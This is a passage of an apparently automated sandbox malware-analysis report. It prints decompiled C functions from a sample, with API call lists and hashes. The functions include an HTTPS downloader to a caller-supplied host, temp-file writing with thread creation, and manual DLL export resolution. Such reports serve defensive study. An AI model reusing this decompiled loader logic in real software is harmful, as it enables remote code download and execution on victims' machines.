                                                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                                                            0x007b6dac
                                                                                                                                                                                                                                                                            0x007b6db3
                                                                                                                                                                                                                                                                            0x007b723f
                                                                                                                                                                                                                                                                            0x007b7244
                                                                                                                                                                                                                                                                            0x007b7244
                                                                                                                                                                                                                                                                            0x007b6dc9
                                                                                                                                                                                                                                                                            0x007b6dd1
                                                                                                                                                                                                                                                                            0x007b6ddc
                                                                                                                                                                                                                                                                            0x007b6de5
                                                                                                                                                                                                                                                                            0x007b6dee
                                                                                                                                                                                                                                                                            0x007b6df7
                                                                                                                                                                                                                                                                            0x007b6e00
                                                                                                                                                                                                                                                                            0x007b6e09
                                                                                                                                                                                                                                                                            0x007b6e15
                                                                                                                                                                                                                                                                            0x007b7028
                                                                                                                                                                                                                                                                            0x007b7039
                                                                                                                                                                                                                                                                            0x007b704a
                                                                                                                                                                                                                                                                            0x007b704f
                                                                                                                                                                                                                                                                            0x007b7077
                                                                                                                                                                                                                                                                            0x007b7099
                                                                                                                                                                                                                                                                            0x007b70a6
                                                                                                                                                                                                                                                                            0x007b70ac
                                                                                                                                                                                                                                                                            0x007b70b6
                                                                                                                                                                                                                                                                            0x007b70c6
                                                                                                                                                                                                                                                                            0x007b70d5
                                                                                                                                                                                                                                                                            0x007b71af
                                                                                                                                                                                                                                                                            0x007b70db
                                                                                                                                                                                                                                                                            0x007b70eb
                                                                                                                                                                                                                                                                            0x007b7107
                                                                                                                                                                                                                                                                            0x007b7114
                                                                                                                                                                                                                                                                            0x007b713d
                                                                                                                                                                                                                                                                            0x007b7163
                                                                                                                                                                                                                                                                            0x007b716f
                                                                                                                                                                                                                                                                            0x007b716f
                                                                                                                                                                                                                                                                            0x007b7183
                                                                                                                                                                                                                                                                            0x007b7183
                                                                                                                                                                                                                                                                            0x007b7189
                                                                                                                                                                                                                                                                            0x007b71bc
                                                                                                                                                                                                                                                                            0x007b71c9
                                                                                                                                                                                                                                                                            0x007b71e0
                                                                                                                                                                                                                                                                            0x007b71e5
                                                                                                                                                                                                                                                                            0x007b71e8
                                                                                                                                                                                                                                                                            0x007b71f5
                                                                                                                                                                                                                                                                            0x007b71fe
                                                                                                                                                                                                                                                                            0x007b7212
                                                                                                                                                                                                                                                                            0x007b7217
                                                                                                                                                                                                                                                                            0x007b7217
                                                                                                                                                                                                                                                                            0x007b7223
                                                                                                                                                                                                                                                                            0x007b7231
                                                                                                                                                                                                                                                                            0x007b7236
                                                                                                                                                                                                                                                                            0x007b7223
                                                                                                                                                                                                                                                                            0x007b71f5
                                                                                                                                                                                                                                                                            0x007b71c9
                                                                                                                                                                                                                                                                            0x007b7239
                                                                                                                                                                                                                                                                            0x007b7239
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b7239
                                                                                                                                                                                                                                                                            0x007b6e1b
                                                                                                                                                                                                                                                                            0x007b6e22
                                                                                                                                                                                                                                                                            0x007b6e29
                                                                                                                                                                                                                                                                            0x007b6e39
                                                                                                                                                                                                                                                                            0x007b6eec
                                                                                                                                                                                                                                                                            0x007b6ef1
                                                                                                                                                                                                                                                                            0x007b6ef4
                                                                                                                                                                                                                                                                            0x007b6e3f
                                                                                                                                                                                                                                                                            0x007b6e4f
                                                                                                                                                                                                                                                                            0x007b6e65
                                                                                                                                                                                                                                                                            0x007b6e6c
                                                                                                                                                                                                                                                                            0x007b6e8c
                                                                                                                                                                                                                                                                            0x007b6e92
                                                                                                                                                                                                                                                                            0x007b6e97
                                                                                                                                                                                                                                                                            0x007b6e9a
                                                                                                                                                                                                                                                                            0x007b6ea6
                                                                                                                                                                                                                                                                            0x007b6ebb
                                                                                                                                                                                                                                                                            0x007b6eca
                                                                                                                                                                                                                                                                            0x007b6ecf
                                                                                                                                                                                                                                                                            0x007b6ecf
                                                                                                                                                                                                                                                                            0x007b6ea6
                                                                                                                                                                                                                                                                            0x007b6edd
                                                                                                                                                                                                                                                                            0x007b6edd
                                                                                                                                                                                                                                                                            0x007b6ee3
                                                                                                                                                                                                                                                                            0x007b6efb
                                                                                                                                                                                                                                                                            0x007b7012
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6f01
                                                                                                                                                                                                                                                                            0x007b6f08
                                                                                                                                                                                                                                                                            0x007b6f1c
                                                                                                                                                                                                                                                                            0x007b6f21
                                                                                                                                                                                                                                                                            0x007b6f21
                                                                                                                                                                                                                                                                            0x007b6f2d
                                                                                                                                                                                                                                                                            0x007b6f35
                                                                                                                                                                                                                                                                            0x007b6f3a
                                                                                                                                                                                                                                                                            0x007b6f3d
                                                                                                                                                                                                                                                                            0x007b6f49
                                                                                                                                                                                                                                                                            0x007b6f55
                                                                                                                                                                                                                                                                            0x007b6f83
                                                                                                                                                                                                                                                                            0x007b6f8b
                                                                                                                                                                                                                                                                            0x007b6fa1
                                                                                                                                                                                                                                                                            0x007b6fa6
                                                                                                                                                                                                                                                                            0x007b6fb2
                                                                                                                                                                                                                                                                            0x007b6fb2
                                                                                                                                                                                                                                                                            0x007b6f57
                                                                                                                                                                                                                                                                            0x007b6f5d
                                                                                                                                                                                                                                                                            0x007b6f65
                                                                                                                                                                                                                                                                            0x007b6f65
                                                                                                                                                                                                                                                                            0x007b6fbb
                                                                                                                                                                                                                                                                            0x007b6fc6
                                                                                                                                                                                                                                                                            0x007b6fcf
                                                                                                                                                                                                                                                                            0x007b6fe9
                                                                                                                                                                                                                                                                            0x007b6ff0
                                                                                                                                                                                                                                                                            0x007b6ff0
                                                                                                                                                                                                                                                                            0x007b6fbb
                                                                                                                                                                                                                                                                            0x007b6fff
                                                                                                                                                                                                                                                                            0x007b700a
                                                                                                                                                                                                                                                                            0x007b700f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6fff

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 007B6DC9
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 007B6DD1
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 007B6E5F
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 007B6EB5
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 007B6EDD
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 007B6F7A
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 007B6FE3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 007B6FF0
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 007B7028
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 007B7059
                                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 007B7077
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 007B7093
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 007B7101
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 007B715D
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 007B7183
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 007B71A9
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007B71BC
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 007B7239
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                            • String ID: TEMP
                                                                                                                                                                                                                                                                            • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                            • Opcode ID: 657256b4211b29bcd1391dc8c6138b79abfc863d8f316fc4204d8debbf89ad36
                                                                                                                                                                                                                                                                            • Instruction ID: 8f23c24f8fa39bb51840c6986b0b632a0bc95ec4d0186a7b2362e082321eb0b7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 657256b4211b29bcd1391dc8c6138b79abfc863d8f316fc4204d8debbf89ad36
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDF1EA75A04208EFDB18DF94D989FDDB7B5BB88300F248198E505AB391D775AE41CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B2900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				CHAR* _v28;
                                                                                                                                                                                                                                                                            				char _v292;
                                                                                                                                                                                                                                                                            				void _v296;
                                                                                                                                                                                                                                                                            				void* _v300;
                                                                                                                                                                                                                                                                            				long _v304;
                                                                                                                                                                                                                                                                            				long _v308;
                                                                                                                                                                                                                                                                            				char* _t54;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                            					_t54 =  *0x7be004; // 0x7bc398
                                                                                                                                                                                                                                                                            					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x7bc3d2, 0x7bc3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                            						if(_v16 != 0) {
                                                                                                                                                                                                                                                                            							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                            							if(_v20 != 0) {
                                                                                                                                                                                                                                                                            								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                            								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                            								_v24 = 4;
                                                                                                                                                                                                                                                                            								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                            								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                            								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                            								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                            									_v308 = GetLastError();
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v300 = 0;
                                                                                                                                                                                                                                                                            									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                            										_v304 = 0;
                                                                                                                                                                                                                                                                            										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                            										if(_v304 != 0) {
                                                                                                                                                                                                                                                                            											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                            											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v8 = _v300;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x007b2909
                                                                                                                                                                                                                                                                            0x007b2914
                                                                                                                                                                                                                                                                            0x007b2936
                                                                                                                                                                                                                                                                            0x007b2942
                                                                                                                                                                                                                                                                            0x007b2949
                                                                                                                                                                                                                                                                            0x007b2972
                                                                                                                                                                                                                                                                            0x007b2979
                                                                                                                                                                                                                                                                            0x007b29a3
                                                                                                                                                                                                                                                                            0x007b29aa
                                                                                                                                                                                                                                                                            0x007b29c0
                                                                                                                                                                                                                                                                            0x007b29c9
                                                                                                                                                                                                                                                                            0x007b29d0
                                                                                                                                                                                                                                                                            0x007b29e8
                                                                                                                                                                                                                                                                            0x007b29f9
                                                                                                                                                                                                                                                                            0x007b2a0e
                                                                                                                                                                                                                                                                            0x007b2a33
                                                                                                                                                                                                                                                                            0x007b2ab5
                                                                                                                                                                                                                                                                            0x007b2a35
                                                                                                                                                                                                                                                                            0x007b2a35
                                                                                                                                                                                                                                                                            0x007b2a3f
                                                                                                                                                                                                                                                                            0x007b2a4a
                                                                                                                                                                                                                                                                            0x007b2a73
                                                                                                                                                                                                                                                                            0x007b2a80
                                                                                                                                                                                                                                                                            0x007b2a90
                                                                                                                                                                                                                                                                            0x007b2a9f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2a82
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2a80
                                                                                                                                                                                                                                                                            0x007b2aaa
                                                                                                                                                                                                                                                                            0x007b2aaa
                                                                                                                                                                                                                                                                            0x007b2acb
                                                                                                                                                                                                                                                                            0x007b2acb
                                                                                                                                                                                                                                                                            0x007b2ad5
                                                                                                                                                                                                                                                                            0x007b2ad5
                                                                                                                                                                                                                                                                            0x007b2adf
                                                                                                                                                                                                                                                                            0x007b2adf
                                                                                                                                                                                                                                                                            0x007b2949
                                                                                                                                                                                                                                                                            0x007b2aeb

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(007BC398,00000001,00000000,00000000,00000000), ref: 007B293C
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,000001BB,007BC3D2,007BC3D1,00000003,00000000,00000000), ref: 007B296C
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,007BC3D8,1.1,00000000,00000000,80800000,00000000), ref: 007B299D
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 007B29C0
                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B29E8
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B2A0E
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(Accept: */*,00000000,00000000), ref: 007B2A1C
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,Accept: */*,00000000), ref: 007B2A2B
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 007B2A73
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B2AAF
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B2ACB
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B2AD5
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B2ADF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: 1.1$Accept: */*$GET$https://%s
                                                                                                                                                                                                                                                                            • API String ID: 2082764430-47765423
                                                                                                                                                                                                                                                                            • Opcode ID: 662ea950a9fd784f2c3b8e9e204836d9e0ee51d002d85c45814c08d15872434b
                                                                                                                                                                                                                                                                            • Instruction ID: f9b0007c8b3d68f59ef0fdf114339ae1db30bd9ea33273cdee421bf9326e7074
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 662ea950a9fd784f2c3b8e9e204836d9e0ee51d002d85c45814c08d15872434b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54510DB194121CABDB25DF94DC89FEE77B4AB48700F10C588FA05A7281C7B89A95CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B35E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                            				char _v532;
                                                                                                                                                                                                                                                                            				void* _v536;
                                                                                                                                                                                                                                                                            				long _v540;
                                                                                                                                                                                                                                                                            				void* _v544;
                                                                                                                                                                                                                                                                            				long _v548;
                                                                                                                                                                                                                                                                            				CHAR* _v552;
                                                                                                                                                                                                                                                                            				void* _v556;
                                                                                                                                                                                                                                                                            				int _v560;
                                                                                                                                                                                                                                                                            				char _v820;
                                                                                                                                                                                                                                                                            				CHAR* _v824;
                                                                                                                                                                                                                                                                            				char _v1084;
                                                                                                                                                                                                                                                                            				signed char _v1085;
                                                                                                                                                                                                                                                                            				long _v1092;
                                                                                                                                                                                                                                                                            				intOrPtr _v1096;
                                                                                                                                                                                                                                                                            				long _t124;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					E007B2E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                            					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                            						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                            						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                            							if(_v540 > 0) {
                                                                                                                                                                                                                                                                            								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                            								_t155 = _v544;
                                                                                                                                                                                                                                                                            								if(_v544 != 0) {
                                                                                                                                                                                                                                                                            									_v548 = 0;
                                                                                                                                                                                                                                                                            									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                            									_v556 = E007B3370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                            									_v552 = E007B3580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                            									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                            									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                            										_v824 = _v552;
                                                                                                                                                                                                                                                                            										_v1085 = 0;
                                                                                                                                                                                                                                                                            										E007B2E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                            										E007B2E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                            										_v1092 = 0;
                                                                                                                                                                                                                                                                            										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                            											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                            													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                            													__eflags = _t124;
                                                                                                                                                                                                                                                                            													_v1092 = _t124;
                                                                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                            													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                            													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                            													_v1085 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            											_v8 = E007B35E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                            										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                            										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                            									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							CloseHandle(_v536);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x007b35e9
                                                                                                                                                                                                                                                                            0x007b35fa
                                                                                                                                                                                                                                                                            0x007b3601
                                                                                                                                                                                                                                                                            0x007b3615
                                                                                                                                                                                                                                                                            0x007b3635
                                                                                                                                                                                                                                                                            0x007b3657
                                                                                                                                                                                                                                                                            0x007b3664
                                                                                                                                                                                                                                                                            0x007b3679
                                                                                                                                                                                                                                                                            0x007b3686
                                                                                                                                                                                                                                                                            0x007b36a2
                                                                                                                                                                                                                                                                            0x007b36a8
                                                                                                                                                                                                                                                                            0x007b36af
                                                                                                                                                                                                                                                                            0x007b36b5
                                                                                                                                                                                                                                                                            0x007b36dd
                                                                                                                                                                                                                                                                            0x007b36f9
                                                                                                                                                                                                                                                                            0x007b3712
                                                                                                                                                                                                                                                                            0x007b3725
                                                                                                                                                                                                                                                                            0x007b3732
                                                                                                                                                                                                                                                                            0x007b374e
                                                                                                                                                                                                                                                                            0x007b3754
                                                                                                                                                                                                                                                                            0x007b3769
                                                                                                                                                                                                                                                                            0x007b377f
                                                                                                                                                                                                                                                                            0x007b3787
                                                                                                                                                                                                                                                                            0x007b37a2
                                                                                                                                                                                                                                                                            0x007b37c6
                                                                                                                                                                                                                                                                            0x007b37e0
                                                                                                                                                                                                                                                                            0x007b37f2
                                                                                                                                                                                                                                                                            0x007b3799
                                                                                                                                                                                                                                                                            0x007b3799
                                                                                                                                                                                                                                                                            0x007b379c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b37f4
                                                                                                                                                                                                                                                                            0x007b380c
                                                                                                                                                                                                                                                                            0x007b381e
                                                                                                                                                                                                                                                                            0x007b383c
                                                                                                                                                                                                                                                                            0x007b3842
                                                                                                                                                                                                                                                                            0x007b3842
                                                                                                                                                                                                                                                                            0x007b37f2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b37c6
                                                                                                                                                                                                                                                                            0x007b385d
                                                                                                                                                                                                                                                                            0x007b3875
                                                                                                                                                                                                                                                                            0x007b3875
                                                                                                                                                                                                                                                                            0x007b385d
                                                                                                                                                                                                                                                                            0x007b387c
                                                                                                                                                                                                                                                                            0x007b3893
                                                                                                                                                                                                                                                                            0x007b38a2
                                                                                                                                                                                                                                                                            0x007b38a2
                                                                                                                                                                                                                                                                            0x007b38b3
                                                                                                                                                                                                                                                                            0x007b38c7
                                                                                                                                                                                                                                                                            0x007b38c7
                                                                                                                                                                                                                                                                            0x007b36af
                                                                                                                                                                                                                                                                            0x007b38d4
                                                                                                                                                                                                                                                                            0x007b38d4
                                                                                                                                                                                                                                                                            0x007b3664
                                                                                                                                                                                                                                                                            0x007b3635
                                                                                                                                                                                                                                                                            0x007b38e0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 007B35F4
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 007B362D
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 007B3651
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007B3673
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 007B369C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 007B36DD
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 007B371F
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,-00000001), ref: 007B380C
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.dll), ref: 007B381E
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007B383C
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B38B3
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B38C7
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007B38D4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                            • String ID: .dll
                                                                                                                                                                                                                                                                            • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                            • Opcode ID: 6fb7fc3314eee9ba0286a7f5b02ce0b76a617724ff91cf127f9b58b7a1bd6201
                                                                                                                                                                                                                                                                            • Instruction ID: 198eb7f86e7f1939d54bcb29ffedbabac5d88ae35d330818b637016d7b68a60a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fb7fc3314eee9ba0286a7f5b02ce0b76a617724ff91cf127f9b58b7a1bd6201
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB815DB5D40228EBDB21DB64DC89FD9B779AB58305F1081C8F209A7281D678ABC4CF65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                                            			E007B2AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                                                                            				void* _v88;
                                                                                                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                                                                                                            				long _v96;
                                                                                                                                                                                                                                                                            				void _v100;
                                                                                                                                                                                                                                                                            				void _v356;
                                                                                                                                                                                                                                                                            				long _v360;
                                                                                                                                                                                                                                                                            				long _v364;
                                                                                                                                                                                                                                                                            				intOrPtr _v368;
                                                                                                                                                                                                                                                                            				void* _v372;
                                                                                                                                                                                                                                                                            				long _v376;
                                                                                                                                                                                                                                                                            				void* _v380;
                                                                                                                                                                                                                                                                            				signed char _v381;
                                                                                                                                                                                                                                                                            				long _v388;
                                                                                                                                                                                                                                                                            				long _v392;
                                                                                                                                                                                                                                                                            				void* _v396;
                                                                                                                                                                                                                                                                            				char _v652;
                                                                                                                                                                                                                                                                            				long _v656;
                                                                                                                                                                                                                                                                            				long _v660;
                                                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                                                            				void* _t140;
                                                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                                                            				long _t149;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
